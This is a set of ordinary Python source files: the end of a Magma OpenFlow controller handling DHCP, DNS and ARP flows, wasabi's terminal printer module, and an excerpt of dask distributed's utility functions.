if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.handle_restart(ue_requests)
def delete_all_flows(self, datapath):
flows.delete_all_flows_from_table(datapath, self.tbl_num)
flows.delete_all_flows_from_table(datapath, self._passthrough_set_tbl)
flows.delete_all_flows_from_table(datapath, self._dhcp_learn_scratch)
flows.delete_all_flows_from_table(datapath, self._imsi_set_tbl_num,
cookie=self.tbl_num)
def add_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return FlowResponse(result=FlowResponse.FAILURE)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
# For handling internal ipfix pkt sampling
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
cookie=self.tbl_num,
next_table=self._ipfix_sample_tbl_num)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
cookie=self.tbl_num,
next_table=self._ipfix_sample_tbl_num)
return FlowResponse(result=FlowResponse.SUCCESS)
def delete_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._delete_resubmit_flow(sid, uplink_match,
tbl_num=self._imsi_set_tbl_num)
self._delete_resubmit_flow(sid, downlink_match,
tbl_num=self._imsi_set_tbl_num)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("From DHCP learn: IMSI %s, has ip %s and mac %s",
imsi, yiaddr, chaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None, tbl_num=None, cookie=0):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
if sid:
actions.append(parser.NXActionRegLoad2(dst=IMSI_REG,
value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, tbl_num,
match, actions=actions,
priority=priority, cookie=cookie,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement and send to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53)
self._add_resubmit_flow(None, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53)
self._add_resubmit_flow(None, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS over tls
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=853)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=853)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
def _add_dhcp_passthrough_flows(self):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67)
self._add_resubmit_flow(None, uplink_match, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68)
        # Set so it triggers a packet-in and we can learn the IP for the ARP response
self._add_resubmit_flow(None, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch,
tbl_num=self._passthrough_set_tbl)
# Install default flow for dhcp learn scratch
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=MagmaMatch(), actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
        Process packet-in DHCP packets: DHCP ACK packets are used to learn the
        ARP entry for the UE and install rules in the ARP table. The DHCP
        packets are then sent through the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
        # Allow ARP packets from the uplink (no eth dst set) to go to the ARP table
self._add_uplink_arp_allow_flow()
self._add_dhcp_passthrough_flows()
self._add_dns_passthrough_flows()
self._add_resubmit_flow(None, MagmaMatch(),
priority=flows.MINIMUM_PRIORITY,
tbl_num=self._passthrough_set_tbl)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(None, MagmaMatch(in_port=self._dpi_port),
priority=flows.PASSTHROUGH_PRIORITY,
next_table=self._app_set_tbl_num)
if self._li_port:
match = MagmaMatch(in_port=self._li_port)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=[], priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
        # TODO We might want a default drop-all rule with min priority, but
        # adding it breaks all unit tests for this controller (needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
|
printer.py
|
# coding: utf8
from __future__ import unicode_literals, print_function
import datetime
from collections import Counter
from contextlib import contextmanager
from multiprocessing import Process
import itertools
import sys
import time
import os
import traceback
from .tables import table, row
from .util import wrap, supports_ansi, can_render, locale_escape
from .util import MESSAGES, COLORS, ICONS
from .util import color as _color
class Printer(object):
def __init__(
self,
pretty=True,
no_print=False,
colors=None,
icons=None,
line_max=80,
animation="⠙⠹⠸⠼⠴⠦⠧⠇⠏",
animation_ascii="|/-\\",
hide_animation=False,
ignore_warnings=False,
env_prefix="WASABI",
timestamp=False,
):
"""Initialize the command-line printer.
pretty (bool): Pretty-print output (colors, icons).
no_print (bool): Don't actually print, just return.
colors (dict): Add or overwrite color values, name mapped to value.
icons (dict): Add or overwrite icons. Name mapped to unicode icon.
line_max (int): Maximum line length (for divider).
animation (unicode): Steps of loading animation for loading() method.
animation_ascii (unicode): Alternative animation for ASCII terminals.
hide_animation (bool): Don't display animation, e.g. for logs.
ignore_warnings (bool): Do not output messages of type MESSAGE.WARN.
env_prefix (unicode): Prefix for environment variables, e.g.
WASABI_LOG_FRIENDLY.
timestamp (bool): Print a timestamp (default False).
RETURNS (Printer): The initialized printer.
"""
env_log_friendly = os.getenv("{}_LOG_FRIENDLY".format(env_prefix), False)
env_no_pretty = os.getenv("{}_NO_PRETTY".format(env_prefix), False)
self._counts = Counter()
self.pretty = pretty and not env_no_pretty
self.no_print = no_print
self.show_color = supports_ansi() and not env_log_friendly
self.hide_animation = hide_animation or env_log_friendly
self.ignore_warnings = ignore_warnings
self.line_max = line_max
self.colors = dict(COLORS)
self.icons = dict(ICONS)
self.timestamp = timestamp
if colors:
self.colors.update(colors)
if icons:
self.icons.update(icons)
self.anim = animation if can_render(animation) else animation_ascii
@property
def counts(self):
"""Get the counts of how often the special printers were fired,
e.g. MESSAGES.GOOD. Can be used to print an overview like "X warnings".
"""
return self._counts
def good(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a success message."""
return self._get_msg(
title, text, style=MESSAGES.GOOD, show=show, spaced=spaced, exits=exits
)
def fail(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.FAIL, show=show, spaced=spaced, exits=exits
)
def warn(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a warning message."""
return self._get_msg(
title, text, style=MESSAGES.WARN, show=show, spaced=spaced, exits=exits
)
def info(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an informational message."""
return self._get_msg(
title, text, style=MESSAGES.INFO, show=show, spaced=spaced, exits=exits
)
def text(
self,
title="",
text="",
color=None,
icon=None,
spaced=False,
show=True,
no_print=False,
exits=None,
):
"""Print a message.
title (unicode): The main text to print.
text (unicode): Optional additional text to print.
color (unicode / int): Foreground color.
icon (unicode): Name of icon to add.
        spaced (bool): Whether to add newlines around the output.
show (bool): Whether to print or not. Can be used to only output
messages under certain condition, e.g. if --verbose flag is set.
no_print (bool): Don't actually print, just return.
exits (int): Perform a system exit.
"""
if not show:
return
if self.pretty:
color = self.colors.get(color)
icon = self.icons.get(icon)
if icon:
title = locale_escape("{} {}".format(icon, title)).strip()
if self.show_color:
title = _color(title, fg=color)
title = wrap(title, indent=0)
if text:
title = "{}\n{}".format(title, wrap(text, indent=0))
if self.timestamp:
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
title = "{}\t{}".format(now, title)
if exits is not None or spaced:
title = "\n{}\n".format(title)
if not self.no_print and not no_print:
print(title)
if exits is not None:
sys.stdout.flush()
sys.stderr.flush()
if self.no_print or no_print and exits != 0:
try:
raise RuntimeError(title.strip())
except Exception as e:
# Remove wasabi from the traceback and re-raise
tb = "\n".join(traceback.format_stack()[:-3])
raise SystemExit("{}\n{}".format(tb, e))
sys.exit(exits)
if self.no_print or no_print:
return title
def divider(self, text="", char="=", show=True, icon=None):
"""Print a divider with a headline:
============================ Headline here ===========================
text (unicode): Headline text. If empty, only the line is printed.
char (unicode): Line character to repeat, e.g. =.
show (bool): Whether to print or not.
icon (unicode): Optional icon to display with title.
"""
if not show:
return
if len(char) != 1:
raise ValueError(
"Divider chars need to be one character long. "
"Received: {}".format(char)
)
if self.pretty:
icon = self.icons.get(icon)
if icon:
text = locale_escape("{} {}".format(icon, text)).strip()
deco = char * (int(round((self.line_max - len(text))) / 2) - 2)
text = " {} ".format(text) if text else ""
text = _color(
"\n{deco}{text}{deco}".format(deco=deco, text=text), bold=True
)
if len(text) < self.line_max:
text = text + char * (self.line_max - len(text))
if self.no_print:
return text
print(text)
def table(self, data, **kwargs):
"""Print data as a table.
data (iterable / dict): The data to render. Either a list of lists
(one per row) or a dict for two-column tables.
kwargs: Table settings. See tables.table for details.
"""
title = kwargs.pop("title", None)
text = table(data, **kwargs)
if title:
self.divider(title)
if self.no_print:
return text
print(text)
def row(self, data, **kwargs):
"""Print a table row.
data (iterable): The individual columns to format.
kwargs: Row settings. See tables.row for details.
"""
text = row(data, **kwargs)
if self.no_print:
return text
print(text)
@contextmanager
def loading(self, text="Loading..."):
if self.no_print:
yield
elif self.hide_animation:
print(text)
yield
else:
sys.stdout.flush()
t = Process(target=self._spinner, args=(text,))
t.start()
try:
yield
except Exception as e:
# Handle exception inside the with block
t.terminate()
sys.stdout.write("\n")
raise (e)
t.terminate()
sys.stdout.write("\r\x1b[2K") # erase line
sys.stdout.flush()
def _spinner(self, text="Loading..."):
for char in itertools.cycle(self.anim):
sys.stdout.write("\r{} {}".format(char, text))
sys.stdout.flush()
time.sleep(0.1)
def _get_msg(self, title, text, style=None, show=None, spaced=False, exits=None):
if self.ignore_warnings and style == MESSAGES.WARN:
show = False
self._counts[style] += 1
return self.text(
title, text, color=style, icon=style, show=show, spaced=spaced, exits=exits
)
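# Minimal usage sketch for the Printer above; the titles and values are
# arbitrary example data, and the function is never called on import.
def _printer_usage_sketch():
    msg = Printer(pretty=True)
    msg.divider("Results")
    msg.good("Build succeeded", "3 artifacts written")
    msg.warn("Skipped 2 optional checks")
    msg.table({"passed": 10, "failed": 0}, title="Summary")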
|
utils.py
|
from __future__ import annotations
import asyncio
import contextvars
import functools
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from collections.abc import Container, KeysView, ValuesView
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from contextvars import ContextVar
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from types import ModuleType
from typing import Any as AnyType
from typing import ClassVar
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None # type: ignore
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
from dask.utils import parse_timedelta as _parse_timedelta
from dask.widgets import get_template
from distributed.compatibility import WINDOWS
from distributed.metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
if method == "forkserver":
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from distributed.versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except OSError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
    ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError(f"interface {ifname!r} doesn't have an IPv4 address")
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
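# Minimal usage sketch for All(): awaiting it from a coroutine gathers the
# results in the same order as `args` (the coroutines here are arbitrary
# examples).
async def _all_usage_sketch():
    async def double(x):
        await asyncio.sleep(0)
        return 2 * x
    return await All([double(1), double(2), double(3)])  # -> [2, 4, 6]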
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
class NoOpAwaitable:
"""An awaitable object that always returns None.
Useful to return from a method that can be called in both asynchronous and
synchronous contexts"""
def __await__(self):
async def f():
return None
return f().__await__()
class SyncMethodMixin:
"""
A mixin for adding an `asynchronous` attribute and `sync` method to a class.
Subclasses must define a `loop` attribute for an associated
`tornado.IOLoop`, and may also add a `_asynchronous` attribute indicating
whether the class should default to asynchronous behavior.
"""
@property
def asynchronous(self):
"""Are we running in the event loop?"""
return in_async_call(self.loop, default=getattr(self, "_asynchronous", False))
def sync(self, func, *args, asynchronous=None, callback_timeout=None, **kwargs):
"""Call `func` with `args` synchronously or asynchronously depending on
the calling context"""
callback_timeout = _parse_timedelta(callback_timeout)
if asynchronous is None:
asynchronous = self.asynchronous
if asynchronous:
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
return future
else:
return sync(
self.loop, func, *args, callback_timeout=callback_timeout, **kwargs
)
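# Minimal sketch of a class using SyncMethodMixin, assuming a LoopRunner
# (defined further below) supplies the required `loop` attribute; the class
# and method names are illustrative only.
class _SyncExample(SyncMethodMixin):
    def __init__(self):
        self._loop_runner = LoopRunner(asynchronous=False)
        self._loop_runner.start()
        self.loop = self._loop_runner.loop
    async def _double(self, x):
        return 2 * x
    def double(self, x):
        # Blocks on the loop thread when called from synchronous code,
        # returns an awaitable when called from within the event loop.
        return self.sync(self._double, x)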
def in_async_call(loop, default=False):
"""Whether this call is currently within an async call"""
try:
return loop.asyncio_loop is asyncio.get_running_loop()
except RuntimeError:
# No *running* loop in thread. If the event loop isn't running, it
# _could_ be started later in this thread though. Return the default.
if not loop.asyncio_loop.is_running():
return default
return False
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = _parse_timedelta(callback_timeout, "s")
if loop.asyncio_loop.is_closed():
raise RuntimeError("IOLoop is closed")
e = threading.Event()
main_tid = threading.get_ident()
result = error = future = None # set up non-locals
@gen.coroutine
def f():
nonlocal result, error, future
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
future = asyncio.ensure_future(future)
result = yield future
except Exception:
error = sys.exc_info()
finally:
e.set()
def cancel():
if future is not None:
future.cancel()
def wait(timeout):
try:
return e.wait(timeout)
except KeyboardInterrupt:
loop.add_callback(cancel)
raise
loop.add_callback(f)
if callback_timeout is not None:
if not wait(callback_timeout):
raise TimeoutError(f"timed out after {callback_timeout} s.")
else:
while not e.is_set():
wait(10)
if error:
typ, exc, tb = error
raise exc.with_traceback(tb)
else:
return result
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops: ClassVar[
weakref.WeakKeyDictionary[IOLoop, tuple[int, LoopRunner | None]]
] = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
if loop is None:
if asynchronous:
self._loop = IOLoop.current()
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
# run loop forever if it's not running already
try:
if not loop.asyncio_loop.is_running():
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if start_exc[0] is not None and not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError(
f"not an exception: {start_exc[0]!r}",
)
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
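# Minimal usage sketch for LoopRunner (the coroutine is an arbitrary example):
# start a background IO loop, run a coroutine on it from synchronous code,
# then stop the loop again.
def _loop_runner_usage_sketch():
    async def greet():
        return "hello"
    runner = LoopRunner(asynchronous=False)
    runner.start()
    try:
        assert runner.run_sync(greet) == "hello"
    finally:
        runner.stop()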
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
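# Minimal usage sketch for tmp_text (filename and contents are arbitrary):
# the temporary file only exists inside the with-block.
def _tmp_text_usage_sketch():
    with tmp_text("example.txt", "hello world") as fn:
        with open(fn) as f:
            assert f.read() == "hello world"
    assert not os.path.exists(fn)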
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x) -> str:
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from distributed.comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('') # Maps as localhost for binding e.g. 'tcp://:8811'
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
if not hostname:
hostname = "localhost"
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
